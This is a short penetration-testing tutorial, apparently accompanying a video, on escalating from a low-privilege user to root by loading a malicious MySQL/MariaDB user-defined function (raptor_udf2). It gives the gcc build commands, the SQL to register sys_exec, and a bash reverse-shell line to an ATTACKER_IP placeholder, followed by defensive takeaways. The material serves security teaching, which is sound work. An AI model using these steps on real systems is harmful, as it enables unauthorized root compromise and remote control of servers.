Premise

In this tutorial, I went through Database exploitation through the use of user-defined functions. The vulnerabilities in user-defined functions can be exploited on MariaDB and MYSQL with slight modifications in the path of the plugin directory. Then through system execution function and with our shellcode created we can use our root access to the database to establish and jump from MySQL into system-wide root reverse shell.

Skills Learned

  • Database Exploitation
  • Maria DB
  • MYSQL DB 

Objective & Setup

I start as a low‑privilege user (like www‑data) and discover a local MySQL service running—interestingly, the MySQL server process is owned by root. That’s a huge red flag because any code executed via the MySQL server inherits root privileges

Finding Credentials

By inspecting web configuration files (config.php), I extract the root password for MySQL. It’s surprising, but this scenario often happens in real-world pentests. Armed with the password, I log in as MySQL root.

Creating a Malicious UDF

This is the technical heart of the video. I build a malicious UDF library that allows me to run shell commands via SQL. Step‑by‑step:

  1. Download the UDF exploit code (raptor_udf2.c) via wget.

  2. Compile it into a shared object (.so) targeting the correct architecture:

 
gcc -g -c raptor_udf2.c gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
  1. Locate MySQL’s plugin directory and upload the compiled .so file there.

  2. Connect to MySQL as root and execute:


 
USE mysql; CREATE TABLE foo(line BLOB);

Then create the UDF, such as:

CREATE FUNCTION sys_exec RETURNS integer SONAME 'raptor_udf2.so';

Once registered, I can invoke the function with:

SELECT sys_exec('bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1');

This spins up a reverse shell running as root!

Why It Works

Since MySQL is running as root, any UDF execution via the server inherits root permissions. It’s effectively a backdoor to full system compromise.

Key Takeaways

  • Never run DBMS as root—always use least‑privilege service accounts.

  • Keep plugin directories secure and not writable by unprivileged accounts.

  • Monitor UDF creation and enforce limits on DLL loading.

  • Use filesystem permissions to prevent unauthorized library uploads.


Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles